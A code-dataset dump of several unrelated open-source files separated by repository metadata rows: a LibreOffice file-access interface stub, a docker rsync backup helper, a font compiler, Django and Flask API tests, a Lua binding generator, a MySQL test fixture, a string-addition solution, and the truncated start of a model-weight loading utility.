com.sun.star.ucb.CommandAbortedException: ``CommandAbortedException``
com.sun.star.uno.Exception: ``Exception``
"""
@abstractmethod
def exists(self, FileURL: str) -> bool:
"""
Checks if a file exists.
Raises:
com.sun.star.ucb.CommandAbortedException: ``CommandAbortedException``
com.sun.star.uno.Exception: ``Exception``
"""
@abstractmethod
def getContentType(self, FileURL: str) -> str:
"""
Returns the content type of a file.
Raises:
com.sun.star.ucb.CommandAbortedException: ``CommandAbortedException``
com.sun.star.uno.Exception: ``Exception``
"""
@abstractmethod
def getDateTimeModified(self, FileURL: str) -> 'DateTime_84de09d3':
"""
Returns the last modified date for the file.
Raises:
com.sun.star.ucb.CommandAbortedException: ``CommandAbortedException``
com.sun.star.uno.Exception: ``Exception``
"""
@abstractmethod
def getFolderContents(self, FolderURL: str, bIncludeFolders: bool) -> 'typing.Tuple[str, ...]':
"""
Returns the contents of a folder.
Raises:
com.sun.star.ucb.CommandAbortedException: ``CommandAbortedException``
com.sun.star.uno.Exception: ``Exception``
"""
@abstractmethod
def getSize(self, FileURL: str) -> int:
"""
Returns the size of a file.
Raises:
com.sun.star.ucb.CommandAbortedException: ``CommandAbortedException``
com.sun.star.uno.Exception: ``Exception``
"""
@abstractmethod
def isFolder(self, FileURL: str) -> bool:
"""
Checks if a URL represents a folder.
Raises:
com.sun.star.ucb.CommandAbortedException: ``CommandAbortedException``
com.sun.star.uno.Exception: ``Exception``
"""
@abstractmethod
def isReadOnly(self, FileURL: str) -> bool:
"""
Checks if a file is \"read only\".
Raises:
com.sun.star.ucb.CommandAbortedException: ``CommandAbortedException``
com.sun.star.uno.Exception: ``Exception``
"""
@abstractmethod
def kill(self, FileURL: str) -> None:
"""
Removes a file.
If the URL represents a folder, the folder will be removed, even if it's not empty.
Raises:
com.sun.star.ucb.CommandAbortedException: ``CommandAbortedException``
com.sun.star.uno.Exception: ``Exception``
"""
@abstractmethod
def move(self, SourceURL: str, DestURL: str) -> None:
"""
Moves a file.
Raises:
com.sun.star.ucb.CommandAbortedException: ``CommandAbortedException``
com.sun.star.uno.Exception: ``Exception``
"""
@abstractmethod
def openFileRead(self, FileURL: str) -> 'XInputStream_98d40ab4':
"""
Opens file to read.
Raises:
com.sun.star.ucb.CommandAbortedException: ``CommandAbortedException``
com.sun.star.uno.Exception: ``Exception``
"""
@abstractmethod
def openFileReadWrite(self, FileURL: str) -> 'XStream_678908a4':
"""
Opens file to read and write.
Raises:
com.sun.star.ucb.CommandAbortedException: ``CommandAbortedException``
com.sun.star.uno.Exception: ``Exception``
"""
@abstractmethod
def openFileWrite(self, FileURL: str) -> 'XOutputStream_a4e00b35':
"""
Opens file to write.
Raises:
com.sun.star.ucb.CommandAbortedException: ``CommandAbortedException``
com.sun.star.uno.Exception: ``Exception``
"""
@abstractmethod
def setInteractionHandler(self, Handler: 'XInteractionHandler_bf80e51') -> None:
"""
Sets an interaction handler to be used for further operations.
A default interaction handler is available as service com.sun.star.task.InteractionHandler. The documentation of this service also contains further information about the interaction handler concept.
"""
@abstractmethod
def setReadOnly(self, FileURL: str, bReadOnly: bool) -> None:
"""
Sets the \"read only\" of a file according to the boolean parameter, if the actual process has the right to do so.
Raises:
com.sun.star.ucb.CommandAbortedException: ``CommandAbortedException``
com.sun.star.uno.Exception: ``Exception``
"""
__all__ = ['XSimpleFileAccess']
| 35.478947 | 206 | 0.645305 | 5,465 | 0.810711 | 0 | 0 | 4,898 | 0.726598 | 0 | 0 | 4,734 | 0.70227 |
25d52bf609ce8588538ff83d163bae532e4ec465 | 4,063 | py | Python | bin/bb8/docker_rsync.py | vimc/bb8 | ec3ad795cc442f33cc58129ab1d9267dc225f9c5 | [
"MIT"
] | null | null | null | bin/bb8/docker_rsync.py | vimc/bb8 | ec3ad795cc442f33cc58129ab1d9267dc225f9c5 | [
"MIT"
] | 22 | 2018-01-25T12:14:41.000Z | 2020-08-18T13:21:13.000Z | bin/bb8/docker_rsync.py | vimc/bb8 | ec3ad795cc442f33cc58129ab1d9267dc225f9c5 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import logging
from os import getuid, getgid
from os.path import join
import docker
from .logger import log_from_docker
class DockerRsync(object):
    """Backs up and restores docker volumes by running rsync-over-ssh inside
    a throwaway ``instrumentisto/rsync-ssh`` container.

    The ``bb8_ssh`` volume is mounted read-only at ``/root/.ssh`` in the
    container to provide the credentials rsync's ssh transport needs.
    """

    def __init__(self, client=None):
        """Create the helper.

        :param client: docker client to use; defaults to one built from the
            environment. Fix: the client used to be created as a default
            argument (``client=docker.from_env()``), which is evaluated once
            at import time -- failing at import when no docker daemon is
            reachable, and sharing a single client across all instances.
        """
        self.client = client if client is not None else docker.from_env()

    def _run_rsync(self, volumes, from_path, to_path, relative):
        """Run one rsync invocation in a container.

        Streams the container logs, checks the exit code, and always removes
        the container. Raises RsyncError on a non-zero exit code; stops the
        container first on KeyboardInterrupt.
        """
        # Disable ssh compression:
        # https://galaxysd.github.io/20160302/Fastest-Way-Rsync
        ssh_cmd = "ssh -o Compression=no"
        cmd = ["rsync",
               # copy directories recursively
               "-r",
               # verbose - give info about what files are being transferred
               # and a brief summary at the end
               "-v",
               # specify remote shell program explicitly (i.e. ssh as opposed
               # to the default rsh)
               "-e", ssh_cmd,
               # preserve file permissions
               "--perms",
               # delete destination files not in source
               "--delete",
               # print overall progress
               "--info=progress2",
               # preserve timestamps
               "--times",
               from_path,
               to_path
               ]
        if relative:
            cmd.append("--relative")
        logging.debug("Running rsync in docker with: " + " ".join(cmd))
        logging.debug("Volume mapping: " + str(volumes))
        container = self.client.containers.run("instrumentisto/rsync-ssh",
                                               command=cmd, volumes=volumes,
                                               detach=True)
        try:
            log_from_docker(container)
            # Refresh the container's state to read the final exit code.
            container.reload()
            code = container.attrs["State"]["ExitCode"]
            if code != 0:
                raise RsyncError(code, container)
        except KeyboardInterrupt as e:
            logging.warning("Stopping container " + container.name)
            container.stop()
            raise e
        finally:
            container.remove()

    def _run_rsync_with_restart(self, volumes, from_path, to_path, relative,
                                restarts=5):
        """Run _run_rsync, retrying up to ``restarts`` times on RsyncError."""
        attempts = 1
        done = False
        while not done:
            try:
                self._run_rsync(volumes, from_path, to_path, relative=relative)
                done = True
            except RsyncError as e:
                print(str(e), flush=True)
                attempts += 1
                if attempts > restarts:
                    raise Exception("rsync failed too many times")
                print("trying again... {}/{}".format(attempts, restarts),
                      flush=True)

    def _get_volume_args(self, local_volume, volume_mode):
        """Build the docker volume mapping: ssh keys plus the data volume."""
        mounted_volume = join("/", local_volume)
        return {
            "bb8_ssh": {"bind": "/root/.ssh", "mode": "ro"},
            local_volume: {"bind": mounted_volume, "mode": volume_mode}
        }

    # local_volume can be an absolute path or a named volume
    def backup_volume(self, local_volume, remote_path):
        """Copy ``local_volume`` (mounted read-only) to ``remote_path``."""
        volumes = self._get_volume_args(local_volume, "ro")
        logging.info("Backing up to {} from {}".format(remote_path,
                                                       local_volume))
        self._run_rsync_with_restart(volumes, local_volume, remote_path,
                                     relative=True)

    def restore_volume(self, local_volume, remote_path):
        """Copy ``remote_path`` back into ``local_volume`` (mounted rw)."""
        mounted_volume = join("/", local_volume)
        volumes = self._get_volume_args(local_volume, "rw")
        remote_path = "{}{}/".format(remote_path, local_volume)
        logging.info("Restoring from {} to {}".format(remote_path,
                                                      local_volume))
        self._run_rsync_with_restart(volumes, remote_path, mounted_volume,
                                     relative=False)
class RsyncError(Exception):
    """Raised when the rsync container exits with a non-zero status code."""

    def __init__(self, code, container):
        message = "Rsync failed with code {}".format(code)
        super().__init__(message)
        # Keep the exit code and the container handle for the retry logic
        # and for post-mortem inspection.
        self.code = code
        self.container = container
| 36.276786 | 79 | 0.537288 | 3,912 | 0.962835 | 0 | 0 | 0 | 0 | 0 | 0 | 893 | 0.219788 |
25d56f5b093e66a6e34a5f01df8b3463c937cd78 | 1,537 | py | Python | Tools/fontcompile.py | aunicornfarmer/gotris | 6c125071d5add7fc71716ecbb08474c607561555 | [
"MIT"
] | 63 | 2015-01-03T04:19:23.000Z | 2021-07-19T22:33:16.000Z | Tools/fontcompile.py | aunicornfarmer/gotris | 6c125071d5add7fc71716ecbb08474c607561555 | [
"MIT"
] | 1 | 2015-09-14T08:55:40.000Z | 2018-01-23T08:56:47.000Z | Tools/fontcompile.py | aunicornfarmer/gotris | 6c125071d5add7fc71716ecbb08474c607561555 | [
"MIT"
] | 28 | 2015-02-23T10:31:05.000Z | 2021-06-18T12:33:51.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
# compiled font is a binary blob:
# 1. magic (MFNT) - 4 bytes
# 2. number of symbols - 4 bytes
# 3. font y advance - 4 bytes
# 4. an array of glyphs (offset_x, offset_y, width, height, tx, ty, tx2, ty2, x_advance) - 36 * number of symbols
# (iiIIffffI)
# 5. png texture
import sys
import struct
import os
from xml2obj import xml2obj
def print_usage_and_exit():
    # NOTE(review): this file is Python 2 (print statement, file(), unicode).
    print "usage: {0} <UNPACKED FONT>".format(sys.argv[0])
    sys.exit(1)
# Argument handling: exactly one argument, the unpacked font image path.
if len(sys.argv) != 2:
    print_usage_and_exit()
fontfile = sys.argv[1]
if not os.path.exists(fontfile):
    print_usage_and_exit()
# Parse the glyph metadata from the .fontdef.xml sidecar file.
glyphs = []
with file(fontfile + ".fontdef.xml", 'r') as f:
    xmlobj = xml2obj(f.read())
    font_y_advance = int(xmlobj.height)
    for g in xmlobj.glyph:
        # (symbol, offset_x, offset_y, width, height, tx, ty, tx2, ty2, x_advance)
        glyphs.append((unicode(g.symbol), int(g.offset_x), int(g.offset_y), int(g.width), int(g.height), float(g.tx), float(g.ty), float(g.tx2), float(g.ty2), int(g.x_advance)))
# Write the binary .font blob (layout described in the header comment above).
with file(fontfile[:-4] + ".font", 'w') as f:
    f.write("MFNT")
    f.write(struct.pack("<I", len(glyphs)))
    f.write(struct.pack("<I", font_y_advance))
    for g in glyphs:
        # Glyph record: skip g[0] (the symbol itself), pack the numeric fields.
        f.write(struct.pack("<iiIIffffI", g[1], g[2], g[3], g[4], g[5], g[6], g[7], g[8], g[9]))
    # Codepoint -> 1-based glyph index table, sorted by codepoint.
    unicode_fontcp = []
    for i, g in enumerate(glyphs):
        unicode_fontcp.append((g[0], i+1))
    def unicode_fontcp_key(item):
        return item[0]
    unicode_fontcp.sort(key=unicode_fontcp_key)
    for entry in unicode_fontcp:
        f.write(struct.pack("<II", ord(entry[0]), entry[1]))
    # Append the raw PNG texture at the end of the blob.
    with file(fontfile, 'r') as imgf:
        imgdata = imgf.read()
    f.write(imgdata)
| 25.616667 | 170 | 0.666233 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 395 | 0.256994 |
25d797d0aac6f91f0e9c9a706f99ce479f5d3726 | 2,047 | py | Python | trojsten/login/tests.py | MvonK/web | b701a6ea8fb6f0bdfb720e66d0a430db13db8bff | [
"MIT"
] | 5 | 2018-04-22T22:44:02.000Z | 2021-04-26T20:44:44.000Z | trojsten/login/tests.py | MvonK/web | b701a6ea8fb6f0bdfb720e66d0a430db13db8bff | [
"MIT"
] | 250 | 2018-04-24T12:04:11.000Z | 2022-03-09T06:56:47.000Z | trojsten/login/tests.py | MvonK/web | b701a6ea8fb6f0bdfb720e66d0a430db13db8bff | [
"MIT"
] | 8 | 2019-04-28T11:33:03.000Z | 2022-02-26T13:30:36.000Z | import json
from django.conf import settings
from django.test import TestCase, override_settings
from django.urls import reverse
from trojsten.people.models import User
@override_settings(SITE_ID=10, ROOT_URLCONF="trojsten.urls.login")
class LoginViewsTests(TestCase):
    """Checks for the login root view, anonymous and authenticated."""

    fixtures = ["sites.json"]

    def test_login_root_view_no_login(self):
        # An anonymous visitor is redirected to the login page.
        response = self.client.get(reverse("login_root_view"), follow=True)
        self.assertRedirects(response, "{}?next=/".format(settings.LOGIN_URL))

    def test_login_root_view_login(self):
        # A logged-in user gets the page directly.
        user = User.objects.create()
        self.client.force_login(user)
        response = self.client.get(reverse("login_root_view"))
        self.assertEqual(response.status_code, 200)
@override_settings(SITE_ID=10, ROOT_URLCONF="trojsten.urls.login")
class ApiTests(TestCase):
    """Checks for the small user-info / login-status API endpoints."""

    fixtures = ["sites.json"]

    def setUp(self):
        self.user = User.objects.create_user(
            username="jozko",
            first_name="Jozko",
            last_name="Mrkvicka",
            email="jozko@mrkvicka.com",
            password="pass",
            graduation=47,
        )

    def test_current_user_info(self):
        # /api/me returns the logged-in user's identity.
        self.client.force_login(self.user)
        payload = self.client.get("/api/me").data
        self.assertEqual(payload["id"], self.user.id)
        self.assertEqual(payload["username"], self.user.username)
        self.assertEqual(payload["email"], self.user.email)

    def test_current_user_info_not_logged_in(self):
        # Anonymous callers get a "not_authenticated" error payload.
        payload = self.client.get("/api/me").data
        self.assertEqual(payload["detail"].code, "not_authenticated")

    def test_is_authenticated(self):
        self.client.force_login(self.user)
        payload = json.loads(self.client.get("/api/checklogin").content)
        self.assertTrue(payload["authenticated"])

    def test_is_authenticated_not_logged_in(self):
        payload = json.loads(self.client.get("/api/checklogin").content)
        self.assertFalse(payload["authenticated"])
| 31.015152 | 78 | 0.6766 | 1,736 | 0.84807 | 0 | 0 | 1,870 | 0.913532 | 0 | 0 | 291 | 0.142159 |
25d8b8019030143e754283529c1bc631afb398f3 | 3,735 | py | Python | gen_bindings.py | mpeterv/emlua | f1c63ae111afba5ccd771e8c1d090af305eebea1 | [
"MIT"
] | 2 | 2016-08-25T16:00:56.000Z | 2021-02-07T03:29:10.000Z | gen_bindings.py | mpeterv/emlua | f1c63ae111afba5ccd771e8c1d090af305eebea1 | [
"MIT"
] | 1 | 2016-08-26T14:57:07.000Z | 2016-08-30T08:49:55.000Z | gen_bindings.py | mpeterv/emlua | f1c63ae111afba5ccd771e8c1d090af305eebea1 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import collections
import re
def write_constants(out, lua_version):
    """Emit the emlua_constants[] table for one Lua 5.x minor version.

    Reads the constant names from lists/lua5<ver>/constants, one per line.
    """
    out.write("EMSCRIPTEN_KEEPALIVE\n")
    out.write("emlua_constant emlua_constants[] = {\n")
    with open("lists/lua5{}/constants".format(lua_version)) as constants_file:
        for raw_line in constants_file:
            name = raw_line.rstrip()
            out.write('{{"{}", {}}},\n'.format(name, name))
    out.write("};\n")
# Mapping from C type names to the JS-side marshalling category used by emlua.
c_js_types = {
    "void": "null",
    "int": "number",
    "char": "number",
    "long": "number",
    "size_t": "number",
    "char *": "string",
    "lua_State *": "state",
    "lua_Alloc": "number",
    "lua_CFunction": "number",
    "lua_KFunction": "number",
    "lua_Reader": "number",
    "lua_Writer": "number",
    "lua_Hook": "number",
    "lua_Integer": "number",
    "lua_Number": "number",
    "lua_Unsigned": "number",
    "lua_KContext": "number"
}
def get_js_type(c_type):
    """Map a C type to its JS marshalling category.

    "const" qualifiers are ignored; unknown pointer types marshal as
    "number".  Returns None for unknown non-pointer types, which the caller
    treats as unsupported.
    """
    bare = c_type[len("const "):] if c_type.startswith("const ") else c_type
    if bare in c_js_types:
        return c_js_types[bare]
    if bare.endswith("*"):
        return "number"
    return None
class Function(object):
    """One C API function parsed from a prototype line in the function list."""
    def __init__(self, function_line):
        # Split "ret_type name(args);".  Group 1 is greedy but must end on a
        # non-word character, so pointer return types stay in group 1.
        line_match = re.match(r"^(.*\W)(\w+)\s*\((.*)\);$", function_line)
        self._ret_type = line_match.group(1).strip()
        js_ret_type = get_js_type(self._ret_type)
        self._name = line_match.group(2)
        self._full_args = line_match.group(3)
        # JS-side type list: return type first, then one entry per argument.
        self._js_types = [js_ret_type]
        self._arg_names = []
        for typed_arg in self._full_args.split(", "):
            if typed_arg == "void":
                # "f(void)" means no arguments.
                break
            elif typed_arg == "..." or typed_arg.endswith("[]"):
                # Varargs and array parameters cannot be wrapped.
                self.supported = False
                return
            # Same trick as above: greedy type, trailing \w+ is the arg name.
            arg_match = re.match(r"^(.*\W)(\w+)$", typed_arg)
            js_arg_type = get_js_type(arg_match.group(1).strip())
            self._js_types.append(js_arg_type)
            self._arg_names.append(arg_match.group(2))
        self.supported = True
    def append_to_function_list(self, out):
        # One row of the emlua_functions[] table: name + space-joined types.
        out.write('{{"{}", "{}"}},\n'.format(self._name, " ".join(self._js_types)))
    def write_emlua_function(self, out):
        # Emit a thin em<name>() C wrapper forwarding to the real function.
        out.write("EMSCRIPTEN_KEEPALIVE\n")
        out.write("{} em{}({}) {{\n".format(self._ret_type, self._name, self._full_args))
        if self._ret_type == "void":
            out.write("  {}({});\n".format(self._name, ", ".join(self._arg_names)))
        else:
            out.write("  return {}({});\n".format(self._name, ", ".join(self._arg_names)))
        out.write("}\n")
def write_functions(out, lua_version):
    """Emit the emlua_functions[] table and the em* wrapper definitions."""
    out.write("emlua_function emlua_functions[] = {\n")
    wrappable = []
    with open("lists/lua5{}/functions".format(lua_version)) as functions_file:
        for raw_line in functions_file:
            parsed = Function(raw_line.rstrip())
            # Skip prototypes the wrapper generator cannot handle.
            if parsed.supported:
                wrappable.append(parsed)
                parsed.append_to_function_list(out)
    out.write("};\n")
    for parsed in wrappable:
        parsed.write_emlua_function(out)
def write_bindings(out, lua_version):
    # Wrap each version's tables in an #if so one C file serves 5.1-5.3:
    # lua_version "1".."3" expands to LUA_VERSION_NUM 501..503.
    out.write("#if LUA_VERSION_NUM == 50{}\n".format(lua_version))
    write_constants(out, lua_version)
    write_functions(out, lua_version)
    out.write("#endif\n")
def main():
    """Generate emlua_bindings.c with tables for Lua 5.1, 5.2 and 5.3."""
    with open("emlua_bindings.c", "w") as out:
        out.write("/* Generated by ./gen_bindings.py. */\n")
        out.write("#include <emscripten.h>\n")
        out.write('#include "lua.h"\n')
        out.write('#include "lualib.h"\n')
        out.write('#include "lauxlib.h"\n')
        # One #if-guarded section per supported Lua minor version.
        for lua_version in ["1", "2", "3"]:
            write_bindings(out, lua_version)
if __name__ == "__main__":
    main()
| 30.867769 | 90 | 0.587952 | 1,456 | 0.389826 | 0 | 0 | 0 | 0 | 0 | 0 | 937 | 0.25087 |
25da3c1cb459bcee6395b9dfd94dc5a75175e53c | 3,183 | py | Python | fixtures/db.py | maxteplyakov/learn_python_test_automation | de40804d58ada5f4165ca6a0070bfb4cfca038d9 | [
"MIT"
] | null | null | null | fixtures/db.py | maxteplyakov/learn_python_test_automation | de40804d58ada5f4165ca6a0070bfb4cfca038d9 | [
"MIT"
] | null | null | null | fixtures/db.py | maxteplyakov/learn_python_test_automation | de40804d58ada5f4165ca6a0070bfb4cfca038d9 | [
"MIT"
] | null | null | null | import mysql.connector
from models.group import Group
from models.contact import Contact
class DbFixture():
    """Read helpers over the addressbook test database.

    Wraps a mysql-connector connection and converts rows into the project's
    Group/Contact model objects.
    """

    def __init__(self, host, name, user, password):
        self.host = host
        self.name = name
        self.user = user
        self.password = password
        # autocommit so reads always see the latest committed state
        self.connection = mysql.connector.connect(
            host=host, database=name, user=user, password=password,
            autocommit=True
        )

    def get_group_list(self):
        """Return all groups as Group model objects."""
        groups = []
        cursor = self.connection.cursor()
        try:
            cursor.execute(
                "SELECT group_id, group_name, group_header, group_footer "
                "FROM group_list"
            )
            for (group_id, name, header, footer) in cursor:
                groups.append(
                    Group(id=str(group_id), name=name, header=header,
                          footer=footer)
                )
        finally:
            cursor.close()
        return groups

    def get_group_by_id(self, id):
        """Return the group with the given id, or None if absent."""
        group = None
        cursor = self.connection.cursor()
        try:
            # Parameterized query: the id was previously interpolated into
            # the SQL text with an f-string (injection-prone).
            cursor.execute(
                "SELECT group_id, group_name, group_header, group_footer "
                "FROM group_list "
                "WHERE group_id=%s",
                (id,)
            )
            for (group_id, name, header, footer) in cursor:
                group = Group(
                    id=str(group_id), name=name, header=header, footer=footer
                )
        finally:
            cursor.close()
        return group

    def get_contact_list(self):
        """Return all non-deleted contacts as Contact model objects."""
        contacts = []
        cursor = self.connection.cursor()
        try:
            # deprecated == zero-date marks live (non-deleted) rows
            cursor.execute(
                "SELECT id, firstname, lastname, address, email "
                "FROM addressbook "
                "WHERE deprecated='0000-00-00 00:00:00'"
            )
            for (contact_id, firstname, lastname, address, email) in cursor:
                contacts.append(
                    Contact(
                        id=str(contact_id),
                        first_name=firstname,
                        last_name=lastname,
                        address=address,
                        email1=email
                    )
                )
        finally:
            cursor.close()
        return contacts

    def get_contact_by_id(self, id):
        """Return the non-deleted contact with the given id, or None."""
        contact = None
        cursor = self.connection.cursor()
        try:
            # Parameterized query: previously built with "%" string
            # formatting (injection-prone).
            cursor.execute(
                "SELECT id, firstname, lastname, address, email "
                "FROM addressbook "
                "WHERE deprecated='0000-00-00 00:00:00' AND id=%s",
                (id,)
            )
            for (contact_id, firstname, lastname, address, email) in cursor:
                contact = Contact(
                    id=str(contact_id),
                    first_name=firstname,
                    last_name=lastname,
                    address=address,
                    email1=email
                )
        finally:
            cursor.close()
        return contact

    def destroy(self):
        """Close the underlying database connection."""
        self.connection.close()
| 30.902913 | 80 | 0.473767 | 3,090 | 0.970782 | 0 | 0 | 0 | 0 | 0 | 0 | 467 | 0.146717 |
25db68b1e4b300ed7435559d769a87a914307b00 | 1,171 | py | Python | app/tests/support/test_views.py | Valaraucoo/raven | 0157e193baf569be9479a78838dc26d77a11a99d | [
"BSD-3-Clause"
] | 3 | 2020-12-27T21:52:52.000Z | 2021-08-23T10:26:10.000Z | app/tests/support/test_views.py | Valaraucoo/raven | 0157e193baf569be9479a78838dc26d77a11a99d | [
"BSD-3-Clause"
] | 12 | 2020-12-22T22:36:28.000Z | 2021-01-18T13:39:34.000Z | app/tests/support/test_views.py | Valaraucoo/raven | 0157e193baf569be9479a78838dc26d77a11a99d | [
"BSD-3-Clause"
] | 2 | 2020-12-27T21:52:39.000Z | 2021-11-18T08:08:25.000Z | import pytest
from django.urls import reverse
from tests.users import factories as users_factories
@pytest.mark.django_db
class TestTicketCreateView:
    """Tests for the support contact form view."""

    def test_get(self, client):
        # The form page renders for anonymous visitors.
        response = client.get(reverse('support:support-contact'))
        assert response.status_code == 200

    def test_post(self, client):
        url = reverse('support:support-contact')
        # An empty submission re-renders the form with status 200.
        assert client.post(url).status_code == 200

        user = users_factories.StudentFactory()
        data = {
            "email": user.email,
            "category": '1',
            "fullname": f'{user.first_name} {user.last_name}',
            "description": "problem"
        }
        # Every category value is accepted and re-renders with status 200.
        for category in ('1', '2', '3', '0'):
            data['category'] = category
            assert client.post(url, data=data).status_code == 200
| 26.022222 | 62 | 0.608027 | 1,045 | 0.8924 | 0 | 0 | 1,068 | 0.912041 | 0 | 0 | 178 | 0.152007 |
25dbcc8ad9f17eebc5ce137f97fcdf06a4148e19 | 1,827 | py | Python | lc0415_add_strings.py | bowen0701/python-algorithms-data-structures | e625f59a9fc59e4728825078d4434a7968a724e5 | [
"BSD-2-Clause"
] | 8 | 2019-03-18T06:37:24.000Z | 2022-01-30T07:50:58.000Z | lc0415_add_strings.py | bowen0701/python-algorithms-data-structures | e625f59a9fc59e4728825078d4434a7968a724e5 | [
"BSD-2-Clause"
] | null | null | null | lc0415_add_strings.py | bowen0701/python-algorithms-data-structures | e625f59a9fc59e4728825078d4434a7968a724e5 | [
"BSD-2-Clause"
] | null | null | null | """Leetcode 415. Add Strings
Easy
URL: https://leetcode.com/problems/add-strings/
Given two non-negative integers num1 and num2 represented as string,
return the sum of num1 and num2.
Note:
- The length of both num1 and num2 is < 5100.
- Both num1 and num2 contains only digits 0-9.
- Both num1 and num2 does not contain any leading zero.
- You must not use any built-in BigInteger library or convert the inputs to
integer directly.
"""
class SolutionPaddingAddBackwardIter(object):
    """Add two decimal numbers given as strings, digit by digit."""

    def _padding(self, num1, num2):
        """Left-pad the shorter string with zeros so lengths match."""
        diff = len(num1) - len(num2)
        if diff > 0:
            num2 = '0' * diff + num2
        elif diff < 0:
            num1 = '0' * (-diff) + num1
        return num1, num2

    def addStrings(self, num1, num2):
        """
        :type num1: str
        :type num2: str
        :rtype: str

        Time complexity: O(n).
        Space complexity: O(1).
        """
        from collections import deque

        num1, num2 = self._padding(num1, num2)
        # Walk both strings from the least-significant digit, carrying.
        digits = deque()
        carry = 0
        pos = len(num1) - 1
        while pos >= 0 or carry > 0:
            total = carry
            if pos >= 0:
                total += int(num1[pos]) + int(num2[pos])
            carry, digit = divmod(total, 10)
            digits.appendleft(str(digit))
            pos -= 1
        return ''.join(digits)
def main():
    # NOTE(review): Python 2 print statements -- this file predates py3.
    # Output: 807.
    num1 = '342'
    num2 = '465'
    print SolutionPaddingAddBackwardIter().addStrings(num1, num2)
    # Output: 10110.
    num1 = '9999'
    num2 = '111'
    print SolutionPaddingAddBackwardIter().addStrings(num1, num2)
if __name__ == '__main__':
    main()
| 25.027397 | 79 | 0.571429 | 1,086 | 0.594417 | 0 | 0 | 0 | 0 | 0 | 0 | 792 | 0.433498 |
25dbd0ea80f4dcc92776fe99c6632dc557ac3ea6 | 4,574 | py | Python | tests/version2/test_users.py | SimonAwiti/Questioner-APIs | 514de4fd3af1726b7f89525c6bfaaed230842853 | [
"MIT"
] | null | null | null | tests/version2/test_users.py | SimonAwiti/Questioner-APIs | 514de4fd3af1726b7f89525c6bfaaed230842853 | [
"MIT"
] | 2 | 2019-01-15T16:02:32.000Z | 2019-01-23T03:32:29.000Z | tests/version2/test_users.py | SimonAwiti/Questioner-APIs | 514de4fd3af1726b7f89525c6bfaaed230842853 | [
"MIT"
] | 1 | 2019-01-13T23:39:06.000Z | 2019-01-13T23:39:06.000Z | """Tests for handling the users resource"""
import unittest
import json
from app import create_app
from app.API.utilities.database import connection
class UserTestCase(unittest.TestCase):
    """Unit testing for the user registration endpoint."""
    def setUp(self):
        """Initialize the app, test client, user payloads and database."""
        self.app = create_app(config_name="testing")
        self.client = self.app.test_client
        # Valid registration payload.
        self.user = {
            "firstname" : "Ken",
            "lastname" : "joseph",
            "email" : "mysecret12@gmail.com",
            "password" : "jos@Aeph12",
            "confirm" : "jos@Aeph12",
        }
        # Unregistered credentials (no "confirm") used for login failures.
        self.user2 = {
            "firstname" : "simon",
            "lastname" : "jose",
            "email" : "myseuuret12@gmail.com",
            "password" : "joseph12",
        }
        # Same email as self.user but a different password.
        self.user3 = {
            "firstname" : "Ken",
            "lastname" : "joseph",
            "email" : "mysecret12@gmail.com",
            "password" : "jo@Aeph12",
            "confirm" : "jo@Aeph12",
        }
        # Malformed email (missing "@").
        self.user4 = {
            "firstname" : "Ken",
            "lastname" : "joseph",
            "email" : "mysecret12gmail.com",
            "password" : "jo@Aeph12",
            "confirm" : "jo@Aeph12",
        }
        # Mismatching password / confirm pair.
        self.user5 = {
            "firstname" : "Ken",
            "lastname" : "joseph",
            "email" : "mysecret12@gmail.com",
            "password" : "josAeph12",
            "confirm" : "jos@Aeph12",
        }
        with self.app.app_context():
            connection.initializedb()
    def create_user(self):
        # Helper: register self.user (response intentionally unchecked).
        response = self.client().post('/api/v2/users/auth/register',
                                      data=json.dumps(self.user),
                                      content_type='application/json')
    def tearDown(self):
        """Drops all tables after tests are done"""
        with self.app.app_context():
            connection.dbconnection()
            connection.drop_tables()
    # NOTE(review): the assertions below are all commented out, so these
    # tests only exercise the endpoints without verifying responses.
    def test_user_register(self):
        """Test to successfully register a new user"""
        response = self.client().post('/api/v2/users/auth/register',
                                      data=json.dumps(self.user),
                                      content_type='application/json')
        #self.assertEqual(response.status_code, 201)
        #self.assertIn('User Successfully Created', str(response.data))
    def test_user_login(self):
        """Successfully log into the app"""
        self.create_user()
        response = self.client().post('/api/v2/users/auth/login',
                                      data=json.dumps(self.user),
                                      content_type='application/json')
        #self.assertEqual(response.status_code, 200)
        #self.assertIn('User Successfully logged in', str(response.data))
    def test_login_wrong_passwords(self):
        """Tests for checking if password match"""
        response = self.client().post(
            '/api/v2/users/auth/login',
            data=json.dumps(self.user2),
            content_type='application/json')
        #self.assertEqual(response.status_code, 401)
        #self.assertIn("Error logging in, credentials not found", str(response.data))
    def test_add_user_who_exists(self):
        """Tests for adding a new user who exists"""
        self.create_user()
        response = self.client().post(
            '/api/v2/users/auth/register',
            data=json.dumps(self.user),
            content_type='application/json'
        )
        #self.assertEqual(response.status_code, 409)
        #self.assertIn("There is a user with the same email registere", str(response.data))
    def test_add_user_with_poor_email(self):
        """Tests for adding a new user with poor email"""
        response = self.client().post(
            '/api/v2/users/auth/register',
            data=json.dumps(self.user4),
            content_type='application/json'
        )
        #self.assertEqual(response.status_code, 401)
        #self.assertIn("Invalid email provided", str(response.data))
    def test_add_user_with_diff_pass(self):
        """Tests for adding a new user with diff password"""
        response = self.client().post(
            '/api/v2/users/auth/register',
            data=json.dumps(self.user5),
            content_type='application/json'
        )
        #self.assertEqual(response.status_code, 401)
        #self.assertIn("Passwords do not match", str(response.data))
| 37.491803 | 91 | 0.547879 | 4,413 | 0.964801 | 0 | 0 | 0 | 0 | 0 | 0 | 1,966 | 0.429821 |
25dc5429f2b771a96edd402c569bf140dac7fc33 | 3,268 | py | Python | maskrcnn_benchmark/utils/big_model_loading.py | microsoft/GLIP | fd52c6361f013e70ae7682d90b3ab3ca2bd5e6bc | [
"MIT"
] | 295 | 2021-12-08T02:22:27.000Z | 2022-03-31T22:27:10.000Z | maskrcnn_benchmark/utils/big_model_loading.py | microsoft/GLIP | fd52c6361f013e70ae7682d90b3ab3ca2bd5e6bc | [
"MIT"
] | 1 | 2021-12-14T08:09:13.000Z | 2022-03-17T03:53:19.000Z | maskrcnn_benchmark/utils/big_model_loading.py | microsoft/GLIP | fd52c6361f013e70ae7682d90b3ab3ca2bd5e6bc | [
"MIT"
] | 9 | 2021-12-09T00:33:25.000Z | 2022-03-17T11:57:42.000Z | import numpy as np
import torch
import torch.nn as nn
from collections import OrderedDict
def tf2th(conv_weights):
    """Convert a numpy array to a torch tensor.

    4-D arrays are assumed to be TF conv kernels in HWIO layout and are
